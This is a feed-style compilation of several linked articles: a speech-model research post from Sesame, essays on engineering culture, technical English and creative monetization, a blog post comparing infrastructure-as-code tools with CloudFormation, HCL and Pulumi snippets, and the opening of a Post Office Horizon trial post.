    Embodies the spirit of “The Gambler” from that Kenny Rogers song. As hokey as the sentiment might sound, there is a certain wisdom in realizing that the outcome of so many situations depends on how we play our hands moment to moment. Know when to speak up, when to accept the impossibility of changing a situation, and when to just get the hell out of there. The gambler in that song is a role model of sorts, although for your own good health you probably want to ignore the bit about getting drunk and dying on a train.

    I will now take no questions

    You might very well be thinking, wait, why do we need such a strong contrarian voice here? Shouldn’t most professional engineers with some amount of experience have enough of a sense of restraint to prevent these issues? Failing that, shouldn’t part of management’s responsibilities involve ensuring that things don’t go too far off the rails? Why can’t we simply extrapolate from the corporate values set forth by senior leadership to stay aligned at every level?

    You would think that, and yet here we are.

    It’s not that you work alongside childish fools. Probably. It’s not that everybody is jockeying for the latitude to build some preposterous pet project using a hot new technology that they can sprinkle over their résumé in the hopes of getting some other job at a company that pays better. Probably. It’s not that management hires warm bodies to do nothing of value all day and none of it matters. Probably. For the most part it really just seems like a group of well-intentioned but slightly bored engineers have goaded each other into following a less than ideal but slightly more interesting path through their day-to-day work. Because if that isn’t the reason, then what are we all even doing here?

    It really does seem as though every team can use no-but engineers to some extent. Even teams that already have one, that person could always use another set of eyes and ears. I believe that anybody who wants to become one, can become one. It takes time and effort, you’ll have to find ways to make it rewarding, and it can also drive you crazy if your organization doesn’t value that way of thinking. But you know what? Somebody else out there does, and they would be lucky to have a no-but engineer like you.

    Oh, and do improv if you get the chance. It’s a blast.

    « Back to Articles
    ]]>
    https://www.scottsmitelli.com/articles/no-but-engineer/ hacker-news-small-sites-43221951 Sat, 01 Mar 2025 18:17:59 GMT
    <![CDATA[Crossing the uncanny valley of conversational voice]]> thread link) | @be7a
    March 1, 2025 | https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice | archive.org

    February 27, 2025

    Brendan Iribe, Ankit Kumar, and the Sesame team

    How do we know when someone truly understands us? It is rarely just our words—it is in the subtleties of voice: the rising excitement, the thoughtful pause, the warm reassurance.

    Voice is our most intimate medium as humans, carrying layers of meaning through countless variations in tone, pitch, rhythm, and emotion.

    Today’s digital voice assistants lack essential qualities to make them truly useful. Without unlocking the full power of voice, they cannot hope to effectively collaborate with us. A personal assistant who speaks only in a neutral tone has difficulty finding a permanent place in our daily lives after the initial novelty wears off.

    Over time this emotional flatness becomes more than just disappointing—it becomes exhausting.

    Achieving voice presence

    At Sesame, our goal is to achieve “voice presence”—the magical quality that makes spoken interactions feel real, understood, and valued. We are creating conversational partners that do not just process requests; they engage in genuine dialogue that builds confidence and trust over time. In doing so, we hope to realize the untapped potential of voice as the ultimate interface for instruction and understanding.

    Key components

    • Emotional intelligence: reading and responding to emotional contexts.
    • Conversational dynamics: natural timing, pauses, interruptions and emphasis.
    • Contextual awareness: adjusting tone and style to match the situation.
    • Consistent personality: maintaining a coherent, reliable and appropriate presence.

    We’re not there yet

    Building a digital companion with voice presence is not easy, but we are making steady progress on multiple fronts, including personality, memory, expressivity and appropriateness. This demo is a showcase of some of our work in conversational speech generation. The companions shown here have been optimized for friendliness and expressivity to illustrate the potential of our approach.

    Conversational voice demo

    1. Microphone permission is required. 2. Calls are recorded for quality review but not used for ML training and are deleted within 30 days. 3. By using this demo, you are agreeing to our Terms of Use and Privacy Policy. 4. We recommend using Chrome (Audio quality may be degraded in iOS/Safari 17.5).

    Technical post

    Authors

    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

    A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second-stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation; semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
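Concretely, with the four codebooks shown above, the first audio frame can only be decoded after four sequential backbone steps - at a 12.5 Hz frame rate (80 ms per frame, as used later in this post), that is four backbone passes before a single 80 ms chunk is playable, and a tokenizer with more codebooks pushes the time-to-first-audio proportionally higher.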

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.
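For intuition: at 12.5 Hz, a hypothetical configuration with N = 8 codebooks would produce 8 RVQ tokens per 80 ms frame, i.e. 100 audio tokens per second of speech, interleaved with the text tokens.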

    Compute amortization

This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden slows down training even with a small model, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.
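For a rough sense of the savings, take hypothetical values of B = 16 and S = 2048: the decoder would otherwise autoregress over B × S = 32,768 frame positions per training step, whereas sampling 1/16th of the frames cuts that to 2,048 - with the zeroth codebook still modeled at every position.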

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

    Pronunciation correction sentence is a recording, all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.
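
As an illustration of how such a benchmark can be scored, here is a minimal TypeScript sketch; the sample shape and the substring match are simplifying assumptions, and in the real pipeline the transcribed phonemes come from running wav2vec2-lv-60-espeak-cv-ft on the generated audio.

// Hypothetical scoring step: each sample pairs the expected phoneme string
// for the word in context with the phonetic transcription of the generated
// audio; accuracy is the fraction of samples whose transcription matches.
interface PronunciationSample {
  word: string;        // e.g., "lead"
  expected: string;    // e.g., "lɛd"
  transcribed: string; // phonemes recovered from the generated audio
}

function pronunciationAccuracy(samples: PronunciationSample[]): number {
  const correct = samples.filter((s) => s.transcribed.includes(s.expected));
  return correct.length / samples.length;
}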

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice hacker-news-small-sites-43221377 Sat, 01 Mar 2025 17:16:35 GMT
    <![CDATA[Technical English is nobody's mother tongue]]> thread link) | @remoquete
    March 1, 2025 | https://passo.uno/native-english-tech-writing/ | archive.org

    The part of my brain that rages against injustice stirs like a slumbering dragon when I read the words “Native English”. As a speaker of English as a second language, I find native to be a rather inadequate, if lazy, choice as an attribute meant to describe linguistic proficiency. You’re born with eyes, but that doesn’t automatically make you a competent watcher; you acquire a language, but that doesn’t automatically turn you into a competent writer.

While it’s true that “native speaker” commonly refers to the first language one acquires as a human being, the same folks who ask for 10 years of experience in a 5-year-old tech usually conflate first language and high proficiency when writing job ads. This is a gross mistake, and one that linguists have been debating for a while. Abby Bajuniemi, a cognitive linguist and researcher, elegantly summarized this when I first posted about this topic on LinkedIn:

    The word “native” speaker is contentious these days among SLA scholars–more folks are moving to first language or something similar. Excluding people for whom a language is a second, third, etc. language just because it’s not their first language when they have high competency is silly. Linguists researching language acquisition think deeply […] about how we define levels of competency in any language.

    The issue only gets worse when one stops and thinks about what flavor of English job ads are referring to. Having acquired English as a first language is sometimes not enough if one doesn’t speak the most prestigious among the 160 dialects of English. Are you from Lagos or Karachi? Tough luck: your English isn’t considered “native” enough for some. This highlights that accent discrimination exists and it’s a pretty big problem in the workplace.

    Doing better than this is not that hard. Just replace native with expert or highly competent and check written samples instead of looking for the place of birth of candidates.

    Technical English is a second language for pretty much everybody

    Nobody grows up writing technical English or speaking Simplified Technical English with mum and dad. The language I use to write documentation is a subset of academic English with very few colloquial intrusions and a sprinkle of product-specific jargon that is treated as a foreign body. A solid command of vernacular English is obviously beneficial to my work – if only to ease communication with subject-matter experts, but I wouldn’t say it’s mandatory.

    One might argue that speakers of English as a second language (ESL) are free from the kind of idiomatic interference that first language speakers must keep in check. Technical English aims for clarity and precision, and ESL speakers focus on using the language as if it was code or music notation rather than the language you use every day with family and friends. We tend to write more deliberately and with greater awareness of potential ambiguities.

    Like coders, technical writers are often proficient in more than one language. In my case, I speak four languages at what you’d call a native level of proficiency (English, Italian, Catalan, and Spanish). This linguistic diversity helps me navigate the complexities of global audiences and localization hurdles. It also helps me frame Technical English as what it is: a language that’s second for everybody, including speakers of English as a first language.

    Communication skills matter more than the language you speak

    Even before the advent of large language models (LLMs), I noticed something interesting about software development: the most skilled programmers are great at thinking about software design, application logic, and other systemic aspects of development. They think the choice of a language is but an implementation detail: they pick one or another to adapt to certain ecosystems or platforms, but they’d equally code using sticks if necessary.

Something similar is going to happen soon with technical writing: with AI-assisted writing, editing, and translation, your proficiency in a specific human language will matter less than your ability to build effective technical communication solutions. It was already like this, but the fact that the code editor I use at work, Cursor, can complete impeccably idiomatic sentences just by hitting the Tab key means that I don’t need to be Hemingway.

    In technical documentation, language is a circumstance, an implementation detail. We use English because it’s the lingua franca of technology at the moment, and because most software is being produced, or innovated, in the Anglosphere. For all I know, the main language of tech comms could be Chinese, Hindi, or Indonesian in 2049. The democratization of English through LLMs and AI agents will only facilitate this sort of lateral movement.

    The next tech revolution might come from Bangalore, Shenzhen, or São Paulo. The companies best positioned to understand, document, and build upon these innovations will be those with diverse technical writers who can bridge linguistic and cultural divides. In a world where LLMs handle the mechanical aspects of language production, the truly valuable skills become cross-cultural communication and technical comprehension.

All else is campanilismo (parochialism).

    ]]>
    https://passo.uno/native-english-tech-writing/ hacker-news-small-sites-43221107 Sat, 01 Mar 2025 16:50:10 GMT
    <![CDATA[Infrastructure as Actual Code]]> thread link) | @ASamsig
    March 1, 2025 | https://asamsig.com/blog/infrastructure-as-actual-code | archive.org



    Setting the Scene

    My first introduction to Infrastructure as Code (IaC) must have been back in 2016. We were exploring AWS for the first time in my team, and we were using CloudFormation with its JSON-formatted templates. I'm pretty sure this was before the YAML-formatted templates were even a thing since that wasn't launched until September 2016.

    Anyway, as a developer, I'm used to writing code. I follow "best practices", such as Don't Repeat Yourself (DRY), by using variables, methods, and abstracting where necessary. I also try to keep it as easy to read, understand, and maintain as possible. Sometimes, that includes comments in my code, usually to explain the rationale behind certain choices or highlight potential gotchas.

    Yes, yes, not everything should be abstracted, You Aren't Going to Need It (YAGNI), and all that.

    Well, you see... The problem with most IaC solutions is that they are actually configuration disguised as code. They sprinkle a narrow set of functions and utilities on top of the configuration language and call it a Domain Specific Language (DSL).

What happens next is a tale as old as time. The functions and utilities are not enough, and the creators have to keep band-aiding the original design. This is how you end up with a badly designed mess of a DSL that bears only a passing resemblance to a programming language. This is true for CloudFormation, Terraform (HCL), ARM, and Bicep.

    There must be a better way, right? Well, I think there is, but first, let's take a look at some of the problems with the current state of affairs.

    JSON as a Configuration Language

    JSON is not a configuration language; it is a data-interchange format. While it is convenient, widespread, well-known, and available in just about all languages, it simply is not a good fit for writing configuration.

My first issue with JSON as a configuration language is that it lacks comments. Comments are often needed in configuration files, especially to explain why a default value was overridden. Also, when working on a remote machine, quickly commenting out a line and restarting the service beats having to delete the line.

    It isn't well-suited for humans either; it involves a lot of braces, commas, and quotes, making it hard to read and write by hand at scale. For example, when defining an array, you might leave a trailing comma, which is invalid JSON.

    CloudFormation

As I wrote earlier, my first introduction to CloudFormation was with the JSON syntax. I don't think I'll ever forget the first time I had to create a string from the output of two resources. It required figuring out how to use a combination of Fn::Join, Fn::Split, Fn::Select, and Ref.

    It was way more of a challenge than manipulating a string has any right to be. Also, it isn't like you're going to be able to use a debugger when it goes wrong. If those hellish-looking functions aren't familiar to you, here is the documentation for CloudFormation's so-called intrinsic functions.

    Take a look at this snippet below, taken from AWS's examples repo.

    {
      "OriginAccessControl": {
        "Type": "AWS::CloudFront::OriginAccessControl",
        "Properties": {
          "OriginAccessControlConfig": {
            "Name": {
              "Fn::Join": [
                "",
                [
                  "rain-build-website-",
                  {
                    "Fn::Select": [
                      2,
                      {
                        "Fn::Split": [
                          "/",
                          {
                            "Ref": "AWS::StackId"
                          }
                        ]
                      }
                    ]
                  }
                ]
              ]
            }
          }
        }
      }
    }
    

    I mean... just woah, that is so horrible. The amount of indentation and brackets is simply astounding. Those brackets are simply not helpful for anyone but computers.

    This was my first experience with IaC, so to say that I was excited about alternatives is an understatement. At this point, we haven't even talked about actually deploying CloudFormation, which is a whole other nightmarish experience.

    To be fair, it is considerably more readable in YAML, but that is not saying much. Here is the same snippet
    in YAML. But look at those double dashes...

    OriginAccessControl:
      Type: AWS::CloudFront::OriginAccessControl
      Properties:
        OriginAccessControlConfig:
          Name: !Join
            - ""
            - - rain-build-website-
              - !Select
                - 2
                - !Split
                  - /
                  - !Ref AWS::StackId
    

    The fundamental issues with CloudFormation run way deeper than just syntax, and YAML can't fix that. This whole thread on HackerNews is such a throwback to the days when I was using CloudFormation myself. Who doesn't miss a little ROLLBACK_FAILED in their lives?

    Just to make something clear before we proceed: I'm not saying that YAML is good, just that it is better than JSON.

    Constraints won't set you free

When using a DSL like CloudFormation, I always reach a point where I get utterly frustrated: I want to do something simple that would take a few lines of code in ANY real language, but with the DSL it feels like I'm wearing a straitjacket, and like I'm going crazy inside it at the same time.

    You have to visit the documentation again and again, and for the most part, you end up copying/pasting samples. You try to make as few adjustments as possible, as you fear the dreaded feedback loop that comes with vendor IaC tools (Bicep, CloudFormation), where the decision engine is owned by the cloud provider.

It seems to me that the people who are sold on these kinds of DSLs are the people who can't code. They don't want to make an investment as big as learning to code, so they fool themselves into thinking that using a DSL is less work. The only thing they end up doing is shoehorning themselves into a corner.

    They then have to cling on for dear life, hoping that it has staying power, as everything they've learned is useless if it doesn't.

Case in point: the Puppet language.

    It is time to stop the cope.

    The case for using a programming language

Using a DSL based on a configuration language usually means you won't have proper tooling like you would with a programming language.

This means that your IDE can't help you unless a Language Server Protocol (LSP) implementation or similar exists. Without proper tooling you won't have autocomplete, syntax highlighting, auto-formatting, refactoring, code navigation, easy separation of units, debugging, or any such things.

If only something existed that had all those wonderful features, that people could use to express complex instructions; perhaps it could even be Turing-complete, I don't know, something like a PROGRAMMING LANGUAGE?

It really makes you wonder whether people realize why TypeScript has gained so much popularity. It is all about the tooling. It actually makes it pleasant to write JavaScript (for the most part). You avoid a lot of errors simply by having static typing.

    Terraform (HCL)

Terraform uses its own custom configuration language, HCL. Luckily for HashiCorp, HCL managed to become popular enough that tooling is now widespread, but a 2.5-star rating for their VS Code plugin... Yikes!

A problem remains, though: HCL will not be familiar to anyone who has not written Terraform before, because no one else uses it, and no one else is going to, let's be real. Funnily enough, GitHub used it early on for GitHub Actions but retired the HCL syntax and switched to YAML.

Personally, I think HCL works well for Terraform, and it is a lot better than JSON, but it still gets hairy when you start introducing loops and conditionals. You're also still at the mercy of the built-in functions and utilities.

    It manages our little string manipulation pretty smoothly, though. This is what the snippet from the previous section looks like in HCL.

    resource "aws_cloudfront_origin_access_control" "oac" {
      name = join("", ["rain-build-website-", split("/", var.stack_id)[2]])
    }
    

But for me it all falls apart so easily. I don't feel like I need to give too many arguments when you can just look at the ecosystem surrounding Terraform. Would you really need the likes of Terragrunt if it weren't for the limiting DSL?

    Let me put their headline from their website here:

    "DRY and maintainable OpenTofu/Terraform code." - Terragrunt

Indicating that Terraform is neither DRY nor maintainable without it? Their words! Not mine! Okay, okay, I jest: maintainable, sure, but DRY?

    Let's move on to deeper issues.

Imagine you need to create a UUID. You quickly check the documentation and find the built-in uuid function, but wait, what does it say?

    "The function generates a well-understood string representation of a 128-bit value, but the output is not RFC-compliant."

What does that mean? Oh no... it generates a random string formatted as a UUID, but it is not RFC-compliant... What were they thinking?

    The "best" way for you to fix that, is to make your own provider, or find a provider that works properly, but let us be honest, perhaps executing a shell script is easier?

    data "external" "generate_uuid" {
      program = ["sh", "-c", "uuidgen"]
    }
    

    I'm being facetious here, trying to get a point across.

    Using actual code

    One of the primary advantages of using a programming language is that you can leverage that language's ecosystem, be it tooling, libraries, or community.

When you have an IaC tool that is designed to be used from a programming language, it can unlock new possibilities. It is time to introduce Pulumi. It fulfills everything I've been talking about this whole time. Did you perhaps see it coming?

    First things first, here is what our mundane snippet from the previous section looks like in Pulumi using TypeScript.

import * as aws from "@pulumi/aws"
import * as pulumi from "@pulumi/pulumi"

// The constructor takes a resource name plus an args object; the three
// settings below are required by the provider.
const oac = new aws.cloudfront.OriginAccessControl("oac", {
  name: `rain-build-website-${pulumi.getStack().split("/")[2]}`,
  originAccessControlOriginType: "s3",
  signingBehavior: "always",
  signingProtocol: "sigv4",
})
    

    Quite simple, easy to read, and easy to understand. Discoverability is also great because of the common dot-notation, allowing you to easily discover what members are available on objects.

    Here are some of the unique features that Pulumi offers:

    • Dynamic providers
    • Function serialization
    • Automation API
    • Avoiding plaintext secrets in your state

A dynamic provider is a provider defined directly in your code. It doesn't have to be packaged; it doesn't even need to live in a separate file. All you have to do is implement a create and a delete, or, if you want to go the whole way, the full CRUD for a fully managed life-cycle.

    For more detailed information, check out the documentation for dynamic providers here.
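
As a minimal sketch (the provider logic below is a placeholder, not a real service), assuming the @pulumi/pulumi package:

import * as pulumi from "@pulumi/pulumi";

// A dynamic provider defined inline: implement create and delete (or the
// full CRUD) and Pulumi manages the resource's life-cycle from your code.
const placeholderProvider: pulumi.dynamic.ResourceProvider = {
  async create(inputs) {
    // Call your service's create API here; return its id and outputs.
    return { id: `demo-${Date.now()}`, outs: inputs };
  },
  async delete(id, props) {
    // Call the corresponding delete API here.
  },
};

class DemoResource extends pulumi.dynamic.Resource {
  constructor(name: string, props: { note: string }, opts?: pulumi.CustomResourceOptions) {
    super(placeholderProvider, name, props, opts);
  }
}

new DemoResource("demo", { note: "managed entirely from code" });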

You also have function serialization. I'm still not entirely sure whether it is a good idea to use in production, as it involves a lot of moving parts, caveats, and possible footguns, but it is a very impressive feature nevertheless. Basically, you can write an inline Lambda function, and Pulumi will take care of the packaging.
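
A rough sketch of what that looks like with @pulumi/aws's CallbackFunction (the handler details are made up):

import * as aws from "@pulumi/aws";

// Function serialization: Pulumi captures this callback, serializes the
// closure, and ships it as the Lambda's code; there is no separate zip step.
const hello = new aws.lambda.CallbackFunction("hello", {
  callback: async () => ({
    statusCode: 200,
    body: "Hello from a serialized function",
  }),
});

export const lambdaName = hello.name;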

Perhaps the biggest killer feature of Pulumi is the Automation API, which allows you to use Pulumi programmatically to provision resources. With Terraform, for example, you'd end up calling the CLI via a shell script or some other means. With Pulumi, you can do it in code, which makes it ideal for building tooling that provisions infrastructure, a full-blown Internal Developer Portal, or some other tool that needs to manage infrastructure.
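
Here is a minimal sketch of the Automation API driving an inline program; the stack and project names are arbitrary:

import { LocalWorkspace } from "@pulumi/pulumi/automation";

// The Automation API runs a Pulumi program from ordinary code instead of
// the CLI, which is what makes it suitable for building provisioning tools.
async function main() {
  const stack = await LocalWorkspace.createOrSelectStack({
    stackName: "dev",
    projectName: "inline-demo",
    // Any Pulumi program can go here; this one only exports an output.
    program: async () => ({ greeting: "provisioned programmatically" }),
  });
  const result = await stack.up({ onOutput: console.log });
  console.log(result.outputs.greeting.value);
}

main().catch((err) => {
  console.error(err);
  process.exit(1);
});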

Pulumi has amazing support for handling secrets and encrypting them in the state file. It is honestly mind-boggling that Terraform doesn't support this, and no, encrypting your state file at rest is not the frigging same. A recent development in Terraform is what they call ephemeral values, which can alleviate some of the issues with secrets in state, but encrypting secrets the way Pulumi does is still far superior.
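
For example (a sketch; the config key is arbitrary), a value marked as a secret stays encrypted inside the state file itself:

import * as pulumi from "@pulumi/pulumi";

// Set beforehand with: pulumi config set --secret dbPassword <value>
// requireSecret returns an Output that Pulumi encrypts in the state file
// rather than merely masking it in console output.
const config = new pulumi.Config();
const dbPassword = config.requireSecret("dbPassword");

export const connectionString = pulumi.interpolate`postgres://app:${dbPassword}@db:5432/app`;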

    Why not Terraform CDK, AWS CDK, etc.?

The fundamental issue with Terraform CDK, AWS CDK, and other similar tools is that they are not actually built as Infrastructure as actual Code. They are merely abstractions that translate to their original data-interchange format. This means they are not actually innovating at all, merely playing an impossible game of catch-up.

    In the case of AWS CDK and the future Azure CDK, they will never even solve the fundamental problem of the cloud provider owning the actual decision engine. They are simply a hack or workaround to solve the issue of picking a configuration language to begin with.

    Conclusion

I'm not saying that Pulumi is objectively the best IaC tool out there, but it is really powerful if you know how to code. Even if you don't need the superpowers it can provide, it is still much better at reducing duplicate code and extracting common patterns than any configuration language.

I urge you to try it out and see for yourself. Even if you don't know how to code, perhaps you'll find out that it isn't so difficult after all, especially with the help of good tooling.

    Forget about the cloud-specific IaC tools. There is simply no good reason to use them.

    With the cloud provider owning the decision engine, you're never actually in control. If you're blocked by a bug, you can't contribute to fixing it. Perhaps if you or your company pays the cloud provider enough money annually, they will actually get back to you.

Third-party IaC tools ship support for new resources really fast. There is no advantage in relying on the first-party tool for early support of new resources and features.

    And most importantly, eventually, you'll want to manage additional infrastructure that is not vendor-specific. This could be DNS records in another registry, or some configuration in a SaaS platform.

    If you're still not convinced, you can always just stick to HCL, and hope that it lasts, hey at least it is better than JSON / YAML, right?

If even that doesn't sway you, I could probably be goaded into a face-off between your choice of IaC tool and Pulumi: you make an implementation in your tool, I'll make one in Pulumi, and we'll see which comes out on top.

Anyways, stay tuned; it is very possible I'll publish more posts about Pulumi and how I use it.

    ]]>
    https://asamsig.com/blog/infrastructure-as-actual-code hacker-news-small-sites-43220631 Sat, 01 Mar 2025 16:05:58 GMT
    <![CDATA[The Antiportfolio: Counter-Advice for Aspiring Artists]]> thread link) | @smnrg
    March 1, 2025 | https://simone.org/antiportfolio/ | archive.org

    A student performer recently reached out to ask me about transitioning from college to “the real world” while pursuing comedy and video production.

    His eyes lit up describing an intimate dorm room improv show he runs: 20–25 people packed in weekly for pure joy and experimentation. Then came a familiar tension: one friend urged him to monetize it immediately, while another suggested preserving its organic magic.

    There's tremendous pressure to monetize every passion.

    The value of an experience is not equivalent to its market value.

    The Pressure to Monetize

    In the connected but pre-algorithmic world of my late teens and 20s (during my “previous life” in journalism and entertainment) I used to sleep two or three hours a night. I was possessed by an almost manic drive to promote every show, every project, every creative endeavor. At the time, it worked. I brute-forced a network effect around me.

    As I became a modest live radio host & TV/web producer (and a bridge builder between European and American comedy scenes) I thought this relentless hustle was the only path forward for what I loved. Pack 100+ people into venues night after night, publish three videos per week, burn through social media campaigns and flyers–all while trying to nurture the creative spark that drew me to comedy in the first place.

    But there's a darker side to ubiquitous hustle culture.


    ]]>
    https://simone.org/antiportfolio/ hacker-news-small-sites-43220477 Sat, 01 Mar 2025 15:54:14 GMT
    <![CDATA[Post Office Trial: Marshall spells it out in a speech to University of Law]]> thread link) | @fanf2
    March 1, 2025 | https://www.postofficetrial.com/2021/06/marshall-spells-it-out-speech-to.html | archive.org

    P. Marshall Esq

    What follows is perhaps the most important speech given on the subject of the Post Office Horizon IT scandal to date. 

